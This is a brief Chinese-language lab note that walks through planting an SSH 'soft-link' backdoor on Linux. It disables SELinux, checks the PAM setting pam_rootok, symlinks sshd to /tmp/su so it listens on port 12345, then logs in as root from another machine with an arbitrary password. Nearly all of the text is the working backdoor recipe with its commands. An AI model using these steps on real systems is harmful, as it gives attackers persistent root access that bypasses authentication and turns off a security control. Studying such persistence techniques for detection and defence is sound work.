一、修改/etc/selinux/config文件中的SELINUX="" 为 disabled 。
二、判断sshd_config配置中的UsePAM参数是否为yes
cat /etc/ssh/sshd_config
三、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。
四、通过命令创建后门软链接,通过查看端口己监听。
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345
netstat -antlp
五、通过另一台机器ssh进行任意密码登录。
ssh root@192.168.137.130 -p 12345
本次实验通过学习安全小白团的文章而成功,本次只做一次简单笔记以便日后翻查。
原始链接如下: